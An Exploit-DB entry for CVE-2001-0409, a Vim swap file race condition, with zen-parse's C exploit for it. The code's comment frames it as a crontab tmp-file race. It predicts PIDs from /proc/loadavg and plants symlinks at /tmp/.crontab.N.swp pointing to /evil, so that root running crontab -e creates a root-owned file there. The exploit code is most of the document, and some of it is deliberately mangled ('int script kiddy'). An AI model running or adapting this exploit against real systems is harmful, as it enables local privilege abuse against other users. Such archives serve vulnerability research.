Vim 5.x - Swap File Race Condition

EDB-ID:

20967

CVE:

2001-0409

EDB Verified:

Author:

zen-parse

Type:

local

Exploit:   /  

Platform:

Linux

Date:

2001-01-26

Vulnerable App: 
/*
source: https://www.securityfocus.com/bid/2927/info

Vim is an enhanced version of the popular text editor vi.

A race condition vulnerability exists in the swap file mechanism used by the 'vim' program. The error occurs when a swap file name for a file being opened is symbolically linked to a non-existent file.

By conjecturing the name of a file to be edited by another user, it may be possible for a local user to create a malicious symbolic link to a non-existent file. This could cause the new target file to be created with the permissions of the user running vim. 
*/

/*******************************************************************
             Crontab tmp file race condition

   http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=37771

   Apparently this is fixed. Wonder why it still works. 
      -- zen-parse

                     Local exploit

   Quick and dirty exploit for crontab insecure tmp files
   Redhat 7.0 - kept up2date with up2date
   Checked Tue Jun 26 00:15:32 NZST 2001
   -rw-------    1 root     root         4096 Jun 26 00:15 evil

   Requires root to execute crontab -e while the program is
   running.

   Not really likely to be too big of a problem, I hope.

   Could possibly be useful with the (still unpatched) 
   makewhatis.cron bug.

/*******************************************************************
 #define SAFER [1000]
/*******************************************************************/
int shake(int script kiddy)
{
 int f;
 char r SAFER;
 int w;

 f=fopen("/proc/loadavg","r"); 
 fscanf(f,"%*s %*s %*s %*s %s",r);
 fclose(f);
 w=atoi(r);
 return w;
}

main(int argc,char *argv[])
{
 int p;
 char v SAFER;
 sprintf(v,"/tmp/.crontab.%d.swp",shake());
 symlink("/evil",v);
 while(access("/evil",0))
 {
  for(p=-30;p<0;p++)
  {
   sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
   symlink("/evil",v);
  }
  sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
  unlink(v);
 }
 for(p=-100;p<0;p++)
 {
  sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
  unlink(v);
 }
}

 /*****************************************************************
 **   ***   *       **       *********      ***********************
 **    *    *   **   ******   *******   **   **********************
 **         *   **   **      ********   *******   ***      ********
 **   * *   *       *******   *******   ******  *  *  *  *  *******
 **   ***   *   ***********   **   **   **   *  *  *  *  *  *******
 **   ***   *   ******       ***   ***      ***   **  ****  *******
 *****************************************************************/
         //   
        //  xxxx   xxx    xxx   x   x
       //  xx     x   x  x      x   x
      //   xx     x   x   xxx   x   x
     //    xx     x   x      x   x x  
    //      xxxx   xxx    xxx     x
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services